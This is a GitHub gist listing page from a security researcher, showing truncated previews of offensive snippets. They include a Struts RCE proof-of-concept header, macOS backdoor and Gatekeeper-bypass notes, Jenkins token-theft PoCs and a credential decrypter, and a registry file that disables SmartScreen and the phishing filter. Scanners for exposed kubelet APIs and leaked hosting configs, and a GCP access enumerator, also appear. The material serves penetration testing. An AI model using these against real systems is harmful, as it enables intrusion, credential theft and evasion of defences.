
Chris Gates carnal0wnage

View CVE-2017-5638.sh
#!/bin/bash
#
# PoC
#
# ./CVE-2017-5638.sh 192.168.9.3
#
# by f0r34chb3t4 - Thu Apr 12 21:00:24 -03 2018
#
# CVE-2017-5638
# Apache Struts 2 Vulnerability Remote Code Execution
View Preparación OSCP.md
View Backdoor Notes
# Creating signed and customized backdoored macOS applications by abusing Apple Developer tools
https://medium.com/@adam.toscher/creating-signed-and-customized-backdoored-macos-applications-by-abusing-apple-developer-tools-b4cbf1a98187
Notes:
Place 1) 1Password 7.app (Gatekeeper approved) and 2) StuffIt Expander.app/Backdoor (not approved) in /tmp/apps. You will be allowed to run both 1) and 2) (Gatekeeper bypass).
Alternative one liner:
$ pkgbuild --root /tmp/apps --identifier com.microsoft --install-location /Applications mypackage.pkg
@carnal0wnage
carnal0wnage / decrypt.py
Created Feb 28, 2019
slightly modified https://github.com/tweksteen/jenkins-decrypt/blob/master/decrypt.py because it was throwing a bytes/string error - change is line 55
View decrypt.py
#!/usr/bin/env python3
import re
import sys
import base64
from hashlib import sha256
from binascii import hexlify, unhexlify
from Crypto.Cipher import AES
MAGIC = b"::::MAGIC::::"
carnal0wnage / gist:fad7c95492224e609ddc47fb08ac8438
Created Feb 28, 2019
Jenkins - SECURITY-180/CVE-2015-1814 PoC
View gist:fad7c95492224e609ddc47fb08ac8438
POST /user/user2/descriptorByName/jenkins.security.ApiTokenProperty/changeToken HTTP/1.1
Host: 10.0.0.160
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:36.0) Gecko/20100101 Firefox/36.0
Accept: text/javascript, text/html, application/xml, text/xml, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
X-Prototype-Version: 1.7
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Referer: https://10.0.0.160:8080/asynchPeople/
carnal0wnage / gist:1f316c01eaa7707c3cc6497ef04857a8
Last active Feb 28, 2019
Jenkins - SECURITY-200 / CVE-2015-5323 PoC
View gist:1f316c01eaa7707c3cc6497ef04857a8
//from: https://gist.github.com/hayderimran7/dec6a655ba671fa5b3c3
import jenkins.security.*
//j.jenkins.setSecurityRealm(j.createDummySecurityRealm());
User u = User.get("admin")
ApiTokenProperty t = u.getProperty(ApiTokenProperty.class)
def token = t.getApiToken()
//token.getClass()
println "token is $token "
View wpeprivate-config.sh
#!/bin/bash
# If you find a site with /_wpeprivate/config.json file exposed, run this and get all kinds of fun goodies.
# If it "no worked" (Technical Term) then you probably need to install jq!
TARGET=$1
# Strip the scheme and path, keeping only the host part of the URL
TARGETDOMAIN=$(echo "$TARGET" | cut -d/ -f3)
# Pretty Colors
RESET='\033[00m'
GREEN='\033[01;32m'
View gist:ff2b86ee166f504eaac362d5dece3529
REGEDIT4
; @ECHO OFF
; CLS
; REGEDIT.EXE /S "%~f0"
; EXIT
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer]
"SmartScreenEnabled"="Off"
[HKEY_CURRENT_USER\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\PhishingFilter]
"EnabledV9"=dword:00000000
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\AppHost]
carnal0wnage / kubelet-find.sh
Created Jan 8, 2019
bash script to open a file of IPs and look for unsecured k8s kubelet APIs (port 10250)
View kubelet-find.sh
#!/bin/bash
# Reads one IP per line from kube-gke.txt and requests the kubelet /runningpods
# endpoint on 10250; a JSON pod list in the response means the kubelet API answers
# without authentication and should be locked down.
for a in $(cat kube-gke.txt); do
  echo "$a"
  curl --insecure "https://$a:10250/runningpods"
  echo ""
  echo ""
done
carnal0wnage / gcp_enum.sh
Last active Feb 28, 2019
Use the gcloud utilities to enumerate as much access as possible from a GCP service account JSON file. See blog post: <to insert>
View gcp_enum.sh
#!/bin/bash
# gcloud auth activate-service-account --key-file=85.json
# gcloud projects list
project="my-project"   # placeholder: set to the project id to enumerate
space=""
echo "gcloud auth list"
gcloud auth list
echo -e "$space"